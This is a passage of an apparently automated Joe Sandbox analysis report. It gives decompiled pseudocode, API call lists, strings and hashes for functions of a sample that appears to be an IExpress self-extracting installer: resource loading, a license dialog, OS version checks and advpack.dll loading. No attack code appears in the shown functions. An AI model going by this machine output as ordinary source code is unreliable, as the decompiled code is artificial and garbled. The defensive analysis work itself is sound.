Instruction Fuzzy Hash: 15316271E00619AFDB15DFB8DD899EEBBB9EB89310F1541A9F805F7250DA30AC058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00386298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00386298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x388004; // 0xb25159a8
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0038171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x389124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x38a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0038171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00386CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00386298
0x003862a0
0x003862a7
0x003862ad
0x003862af
0x003862bb
0x003862c3
0x003862c4
0x0038633b
0x0038633b
0x00386345
0x0038634d
0x00000000
0x00000000
0x003862da
0x003862de
0x0038635f
0x00386369
0x003862e0
0x003862e0
0x003862e0
0x003862e3
0x003862e5
0x003862e5
0x003862e8
0x003862e8
0x003862ea
0x003862eb
0x003862ef
0x003862f1
0x003862f3
0x00386302
0x00386308
0x0038630d
0x00386314
0x00386314
0x00386316
0x00386319
0x00386355
0x00386357
0x0038631b
0x0038631b
0x00386331
0x00386334
0x00386339
0x00000000
0x00386339
0x00386319
0x0038636b
0x0038637d
0x0038637d
0x00000000

APIs

Part of subcall function 0038171E: _vsnprintf.MSVCRT ref: 00381750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 003862CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 003862D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 0038631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00386345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003851CA,00000004,00000024,00382F71,?,00000002,00000000), ref: 00386357

Strings

UPDFILE%lu, xrefs: 003862B3, 00386329

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 8fb951f66470f73829fcd8e64e7417b655164695ec023a04845692bdecb3c31e
Instruction ID: c7cd82c87d2599bddd62b66835d83f518cc6dc5a95a7b2c016b284d936d8da13
Opcode Fuzzy Hash: 8fb951f66470f73829fcd8e64e7417b655164695ec023a04845692bdecb3c31e
Instruction Fuzzy Hash: B221F675A00719ABDB12AF64DC4A9FE7B7CEB48710F04019AF902A7251DB759D028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00383A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00383A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0038468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x388d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0038468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x388d4c, "<None>") == 0) {
							LocalFree( *0x388d4c);
							L9:
							 *0x389124 = 0;
							return 1;
						}
						_t9 = E00386517(_t19, 0x7d1, 0, E00383100, 0, 0);
						LocalFree( *0x388d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x389124 = 0x800704c7;
						L2:
						return 0;
					}
					E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x388d4c);
					 *0x389124 = 0x80070714;
					goto L2;
				}
				E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x389124 = E00386285();
				goto L2;
			}

0x00383a46
0x00383a57
0x00383a5d
0x00383a63
0x00383a6a
0x00383a91
0x00383a9a
0x00383ad8
0x00383b13
0x00383b19
0x00383b1b
0x00000000
0x00383b21
0x00383ae7
0x00383af4
0x00383afc
0x00000000
0x00000000
0x00383afe
0x00383a87
0x00000000
0x00383a87
0x00383aa8
0x00383ab3
0x00383ab9
0x00000000
0x00383ab9
0x00383a78
0x00383a82
0x00000000

APIs

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00382F64,?,00000002,00000000), ref: 00383A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00383AB3

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00383AD0
LocalFree.KERNEL32 ref: 00383B13

Part of subcall function 00386517: FindResourceA.KERNEL32(00380000,000007D6,00000005), ref: 0038652A
Part of subcall function 00386517: LoadResource.KERNEL32(00380000,00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00386538
Part of subcall function 00386517: DialogBoxIndirectParamA.USER32(00380000,00000000,00000547,003819E0,00000000), ref: 00386557
Part of subcall function 00386517: FreeResource.KERNEL32(00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00386560

LocalFree.KERNEL32(00000000,00383100,00000000,00000000), ref: 00383AF4

Strings

<None>, xrefs: 00383AC5
LICENSE, xrefs: 00383A46

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 428da16e08a4c16e7eb20a5e0e24aa4c13d4ce6eff371ed917fcc0058ca06b44
Instruction ID: 0c6b60513924da75b0966608e14ddaee1faf5216e2334d995c2d3f8468ba821f
Opcode Fuzzy Hash: 428da16e08a4c16e7eb20a5e0e24aa4c13d4ce6eff371ed917fcc0058ca06b44
Instruction Fuzzy Hash: F511B170204301ABD727BB72AC09F277AADDBD5B00F1044EFB542DE6A0DA7989018760

Uniqueness

Uniqueness Score: -1.00%

Function 003824E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E003824E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x388004; // 0xb25159a8
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0038658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00386CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x003824e0
0x003824eb
0x003824f2
0x003824f7
0x00382504
0x0038250e
0x0038251d
0x0038252c
0x00382541
0x00382546
0x00382553
0x00382555
0x00382555
0x00382546
0x0038256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00382506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0038252C
_lopen.KERNEL32 ref: 0038253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0038254C
_lclose.KERNEL32(00000000), ref: 00382555

Strings

wininit.ini, xrefs: 00382510

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 641cf5872dd5ff8335a1e9338a41c07dbb4cee642811133853c214b689a3b84a
Instruction ID: d70b3184fff7bed2b119729e921015ff8aeb8313197c9f4abf907dc5e7710d17
Opcode Fuzzy Hash: 641cf5872dd5ff8335a1e9338a41c07dbb4cee642811133853c214b689a3b84a
Instruction Fuzzy Hash: 4E0192726003186BD721AB659C09EDFBB7CDB46760F0001D5FA49D7190DA748E468B91

Uniqueness

Uniqueness Score: -1.00%

Function 003836EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E003836EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x388004; // 0xb25159a8
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x388184 = 1;
						 *0x388180 = 1;
						L13:
						 *0x389a40 = _t119;
						L14:
						__eflags =  *0x388a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00382A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00382A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x388a38 & 0x00000001;
											if(( *0x388a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lega");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0038681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E003867C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E003828E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x389a40 = _t119;
						 *0x388184 = 1;
						 *0x388180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x389a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x388184 = _t135;
							 *0x388180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E003844B9(0, _t138);
					L66:
					return E00386CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x003836f9
0x00383700
0x0038370c
0x00383716
0x00383718
0x0038371b
0x00383721
0x0038372b
0x0038373d
0x00383745
0x00383746
0x00383746
0x00383749
0x003837ab
0x003837ad
0x003837ae
0x003837b3
0x003837b8
0x003837b8
0x003837bf
0x003837bf
0x003837c5
0x00000000
0x00000000
0x003837cb
0x003837cd
0x00000000
0x00000000
0x003837d5
0x003837db
0x003837e8
0x003837ea
0x003837ea
0x003837ea
0x003837f0
0x003837f6
0x00383805
0x00383817
0x0038382b
0x00383830
0x00383836
0x0038383b
0x0038383d
0x003838eb
0x003838eb
0x003838f2
0x0038390c
0x00383911
0x00383911
0x00383913
0x0038394d
0x0038394d
0x0038394f
0x003838a9
0x003838a9
0x003838b0
0x003838b2
0x003838b9
0x003838bb
0x003838c1
0x00383975
0x003838c7
0x003838de
0x003838e0
0x003838e0
0x0038397b
0x0038397d
0x003839a9
0x0038397f
0x00383982
0x0038398b
0x0038398d
0x0038398f
0x0038399f
0x003839a1
0x00383991
0x00383991
0x00383991
0x0038398f
0x003839af
0x003839b6
0x00383a0f
0x00383a0f
0x00383a11
0x00383a13
0x00383a19
0x00000000
0x003839b8
0x003839b8
0x003839ba
0x00000000
0x00000000
0x003839bc
0x003839bf
0x00000000
0x00000000
0x003839c3
0x003839c9
0x003839ce
0x003839d0
0x003839e3
0x003839e5
0x003839e6
0x003839f1
0x003839f7
0x003839fa
0x00383a01
0x00383a04
0x00000000
0x00000000
0x00383a06
0x00383a09
0x00383a09
0x00383a0b
0x00383a0b
0x00000000
0x00383a09
0x003839fc
0x00000000
0x003839fc
0x003839d3
0x003839d8
0x003839da
0x00000000
0x00000000
0x00000000
0x003839dc
0x003839b6
0x00383955
0x0038395b
0x00000000
0x00000000
0x00383961
0x00383963
0x00000000
0x00000000
0x00383969
0x00383969
0x00000000
0x00383969
0x00383915
0x00383915
0x0038391b
0x0038391f
0x00000000
0x00000000
0x0038392d
0x00383933
0x00383938
0x0038393a
0x00000000
0x00000000
0x00383940
0x00383946
0x0038394b
0x00000000
0x0038394b
0x00000000
0x003838f2
0x00383843
0x00383845
0x00000000
0x00000000
0x0038384b
0x0038384d
0x00383883
0x00383885
0x00000000
0x00000000
0x0038389a
0x0038389e
0x0038389e
0x00000000
0x00000000
0x003838a0
0x003838a0
0x003838a2
0x00000000
0x00000000
0x003838a4
0x00000000
0x003838a4
0x0038384f
0x00383851
0x00383857
0x0038386e
0x00383877
0x0038387b
0x00000000
0x00000000
0x00000000
0x00383881
0x00383859
0x0038385c
0x00383862
0x00383866
0x00000000
0x00000000
0x00383868
0x00000000
0x003838f4
0x003838f4
0x003838f5
0x003838fb
0x00383901
0x00383901
0x00000000
0x0038390a
0x0038374b
0x0038374e
0x0038375c
0x00383764
0x00383769
0x0038376e
0x00383771
0x0038379c
0x0038379f
0x00000000
0x00000000
0x003837a3
0x003837a4
0x00000000
0x003837a4
0x00383773
0x00383777
0x00383778
0x0038377f
0x00383781
0x0038378e
0x0038378e
0x00383794
0x00000000
0x00383794
0x00383783
0x00000000
0x00000000
0x00383785
0x0038378c
0x00000000
0x00000000
0x00000000
0x0038378c
0x00383750
0x00000000
0x0038372d
0x0038372d
0x0038396b
0x0038396b
0x0038396c
0x0038396e
0x0038396f
0x00383a1e
0x00383a1e
0x00383a22
0x00383a27
0x00383a3e
0x00383a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00383723
MessageBeep.USER32(00000000), ref: 003839C3
MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 003839F1

Strings

lega, xrefs: 003839E9, 00383A19
3, xrefs: 00383785

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lega
API String ID: 2519184315-680046778
Opcode ID: 88bff3ab5e97c50a9d7e6c1d42597606f34f1ee3c8afc202a77d5835c45e1e72
Instruction ID: 90e8d4ea7dd9ee16e17fec02d4cbc40bf0de05a657f56a6822f37a6405c2d1b6
Opcode Fuzzy Hash: 88bff3ab5e97c50a9d7e6c1d42597606f34f1ee3c8afc202a77d5835c45e1e72
Instruction Fuzzy Hash: 7491C471A013149BEB3BAF25CC91BEA77A5EB45B04F1600E9D8899B351DB748F81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00386517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00386517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x389a3c; // 0x380000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E003844B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x382ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0038651f
0x0038652a
0x00386534
0x0038656b
0x00386577
0x0038657c
0x0038657c
0x00386536
0x0038653e
0x00386542
0x00000000
0x00386544
0x00386547
0x0038654c
0x00386549
0x00386549
0x00386549
0x0038655e
0x00386560
0x00386569
0x00000000
0x00000000
0x00386569
0x00386542
0x00386587

APIs

FindResourceA.KERNEL32(00380000,000007D6,00000005), ref: 0038652A
LoadResource.KERNEL32(00380000,00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00386538
DialogBoxIndirectParamA.USER32(00380000,00000000,00000547,003819E0,00000000), ref: 00386557
FreeResource.KERNEL32(00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00386560

Strings

.8, xrefs: 0038657C

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .8
API String ID: 1214682469-3342083374
Opcode ID: 73ab98e342ed0afd499826a0b7914a1b52da31f04ffd58eb05cf4486afaafd05
Instruction ID: 5a9b6fea4256dc1d32ceef73e0f98f2cf3c70df3005bf5b896a3a04c828e7326
Opcode Fuzzy Hash: 73ab98e342ed0afd499826a0b7914a1b52da31f04ffd58eb05cf4486afaafd05
Instruction Fuzzy Hash: C10149B2100709BBDB126FA99C09EBB7B6DEB8A760F0101A6FE00A3190D775CD10C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00386495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00386495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x388004; // 0xb25159a8
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00381781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0038658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00386CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00386495
0x00386495
0x003864a0
0x003864a7
0x003864ab
0x003864bd
0x003864c2
0x003864d3
0x003864df
0x003864e8
0x00386502
0x003864ee
0x003864f9
0x003864f9
0x00386516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003864DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003864F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00386502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003864AC
advpack.dll, xrefs: 003864C2, 003864CD, 00386501

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
